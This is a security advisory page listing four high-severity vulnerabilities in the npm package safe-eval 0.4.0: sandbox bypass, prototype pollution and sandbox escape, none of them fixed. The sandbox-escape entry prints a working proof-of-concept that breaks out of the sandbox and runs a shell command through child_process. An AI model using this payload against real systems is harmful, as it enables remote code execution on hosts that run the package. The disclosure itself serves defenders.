safe-eval@0.4.0 vulnerabilities

Safer version of eval()

Direct Vulnerabilities

Known vulnerabilities in the safe-eval package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability / Vulnerable version

[Severity: High] Sandbox Bypass

safe-eval is a Safer version of eval()

Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The bypass is achieved by exploiting prototype pollution. Exploiting this vulnerability may result in remote code execution (RCE).

Vulnerable functions:

__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

How to fix Sandbox Bypass?

There is no fixed version for safe-eval.

Vulnerable version range: *

[Severity: High] Prototype Pollution


Affected versions of this package are vulnerable to Prototype Pollution via the safeEval function, due to improper sanitization of its parameter content.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

Vulnerable version range: *

[Severity: High] Prototype Pollution


Affected versions of this package are vulnerable to Prototype Pollution, which allows an attacker to add or modify properties of Object.prototype when using the safeEval function. This is because the function relies on the vm module, which lets an attacker modify properties of Object.prototype.

How to fix Prototype Pollution?

There is no fixed version for safe-eval.

Vulnerable version range: *

[Severity: High] Sandbox Escape


Affected versions of this package are vulnerable to Sandbox Escape. It is possible for an attacker to run an arbitrary command on the host machine.

POC by Anirudh Anand (for node 12.13.0)

const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));

How to fix Sandbox Escape?

There is no fixed version for safe-eval.

Vulnerable version range: *